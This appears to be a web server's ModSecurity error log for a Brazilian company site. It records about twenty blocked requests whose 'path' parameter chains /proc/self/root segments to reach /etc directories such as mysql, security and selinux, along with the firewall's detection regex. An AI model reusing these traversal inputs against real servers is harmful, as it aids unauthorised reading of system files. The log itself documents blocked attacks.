https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:37.545580 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:35634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TCQF0L0L-SsrnPo5VPAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:37.667872 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:50014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TCeoXxyEfFpUF8f9vzgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:39.491515 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:50022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TCjJ3M9BSuKP7CAYE8gAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:40.700606 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.241.31:35642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TDPqxLDW4GITHUkTStwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:40.978990 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:43220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TDPqxLDW4GITHUkTSuAAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:41.989534 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.241.31:35648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TDfqxLDW4GITHUkTSvAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:42.168089 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:43226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TDvqxLDW4GITHUkTSvQAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:43.716384 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:43238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TD_HIg5MgXLBnicPnMAAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:43.720838 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:35650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TDxCii7xarUs8iHZV9gAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:45.108306 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:35654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TERCii7xarUs8iHZV-gAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:46.216873 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.243.128:43246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TEhCii7xarUs8iHZV_QAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:46.321070 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.241.31:35660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TEjJ3M9BSuKP7CAYE9QAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:47.511134 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.243.128:43256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TEwF0L0L-SsrnPo5VRgAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:47.592209 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.241.31:39782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TExCii7xarUs8iHZV_gAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:48.862550 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:43262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TFBCii7xarUs8iHZWAQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:48.917140 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.241.31:39790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TFBCii7xarUs8iHZWAgAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:50.165000 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.243.128:59392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TFvHIg5MgXLBnicPnNwAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:50.220195 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.241.31:39798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TFvHIg5MgXLBnicPnOAAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:51.443021 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:39812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TFxCii7xarUs8iHZWCAAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:51.510549 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:59406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TFwF0L0L-SsrnPo5VSgAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:52.696647 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:39818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TGAF0L0L-SsrnPo5VTAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
